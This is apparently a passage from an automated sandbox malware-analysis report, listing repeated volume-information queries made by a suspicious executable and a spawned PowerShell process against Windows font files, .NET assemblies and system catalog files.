                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
